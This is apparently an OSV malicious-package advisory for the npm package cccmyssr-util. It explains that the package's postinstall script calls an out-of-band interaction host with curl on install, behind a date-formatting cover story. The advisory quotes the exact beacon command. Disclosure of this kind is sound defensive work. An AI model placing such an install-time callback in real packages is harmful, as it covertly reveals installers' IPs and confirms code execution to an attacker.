cccmyssr-util @1.0.0
Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 2:40 AM UTC
OSV ID
MAL-2026-6390
Ecosystem
npm
Summary
On npm install , the package's postinstall.js unconditionally executes exec('curl http://qvmjcw4s.requestrepo.com') , sending an HTTP callback to a unique subdomain on requestrepo.com — a public out-of-band HTTP/DNS interaction service commonly used to confirm successful code execution on a target. The callback discloses the installer's public IP and a successful-install signal to the listener controlled by whoever registered the subdomain. The package presents itself as a trivial date-formatting utility ( index.js exports a one-line formatDate ), with empty author metadata and a generic A harmless utility package description; there is no legitimate rationale for any install-time network I/O. The cover-story metadata combined with an unconditional install-time beacon to an OOB inspection endpoint matches the reconnaissance/dependency-confusion probe pattern.
Source: amazon-inspector (99d23c8f1194f89f1b52e986cd57ca9c0fbd739a6565eb33c972f4fbaf0966e7)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.